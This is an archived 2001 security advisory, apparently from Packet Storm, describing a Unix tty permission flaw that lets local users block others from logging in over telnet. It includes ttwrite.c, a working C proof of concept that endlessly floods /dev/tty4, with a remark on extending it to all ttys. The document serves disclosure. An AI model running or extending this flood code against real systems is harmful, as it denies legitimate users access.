what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

scx-sa-13.txt

scx-sa-13.txt
Posted Jan 1, 2001
Authored by Root-dude | Site securax.org

Securax Security Advisory #13 - When someone telnets to a unix system, the tty that will be assigned to him will be writable for any user on the system. However, when he is logged in, his tty will not be writable for all users. So if someone would write data to a tty that is currently used by someone who's logging in, that person won't be able to log in. Includes ttywrite.c proof of concept code.

tags | exploit, proof of concept
systems | unix
SHA-256 | e75a840488618e3a62e3bda5514108f15199ee99169afe9ae87c7041a15d8156

scx-sa-13.txt

Change Mirror Download
=============================================================================
Securax-SA-13 Security Advisory
belgian.networking.security Dutch
=============================================================================
Topic: all tty's can be written to when connecting
Announced: 2001-01-01
Affects: SuSE linux 6.4
probably all versions of unix (not tested)
=============================================================================


Note: This entire advisory has been based upon trial and error results. We
can not ensure the information below is 100% correct being that we have
no source code to audit. This document is subject to change without
prior notice.

I. Problem Description
-----------------------

when someone telnets to a unix system, the tty that will be assigned to him
will be writable for any user on the system. However, when he is logged in,
his tty will not be writable for all users. So if someone would write data to
a tty that is currently used by someone who's logging in, that person won't
be able to log in.

II. Impact
----------

The impact can be pretty severe, allowing no one to log in. the Proof of
concept code I created will demonstrate this, but only on 1 given tty, this
was done for 2 basic reasons, 1 so the kiddies can't play to much with this
code and seconde that this was written in less than 5 minutes (there was a
lack of time)

/*
* ttwrite.c
* ---------
*
* written by ROOT-dude
*
* ok, this code is pretty shitty, but it works
* so far it's only set to flood tty4, but with a
* little modification, you can flood all tty's.
* I made this limitation so the kiddies can't
* play to much !!! (THIS IS ONLY PROOF OF
* CONCEPT CODE !!!!)
*
* I found this bug when I was messing around
* with this tool I found, called m0000h.sh
* which did the same but for /dev/pts,
* (that still isn't fixed btw) only "prob" is
* pts is for pseudo terminals, so a normal
* remote telnet connection will get a tty assinged
* and not a pts !!!!
*
* greetZ to :: incubus, f0bic, F_F, nostalgic,
* t-omicron, zym0t1c, tosh, vorlon, cicero,
* zoa, demongirl, so many others i forgot ...
*
* oh, yea, I nor the securax crew can't he held
* respronsible for any use or misuse of this
* source in any way, form, OR shape !
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define string "aaaaaaaaaa"

main()
{
int fd;
char tty[25];

bzero(tty, sizeof(tty));
strcat(tty, "/dev/tty4"); /* change to tty you want */
fd = open(tty, O_WRONLY);
while(fd < 0)
{
fd = open(tty, O_WRONLY);
}

while(fd)
{
write(fd, string, sizeof(string));
}

close(fd); /* no need to close it, but we'll code it anyway !*/

}

III. Solution
--------------

So far the only solution I've come up with is to close telnet, and others
servers like it !

IV. Credits
-------------

greetZ to :: incubus, f0bic, F_F, nostalgic, t-omicron, zym0t1c, tosh,
vorlon, cicero, zoa, demongirl, so many others I forgot ...

-R00T-dude(root@htw.zzn.com or ilja@securax.org).


=============================================================================
For more information ilja@securax.org
Website http://www.securax.org
http://www.hexyn.be
Advisories/Text http://www.securax.org/pers
http://www.hexyn.be/sections.php?op=listarticles&secid=1
-----------------------------------------------------------------------------
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    26 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    18 Files
  • 21
    Jun 21st
    8 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close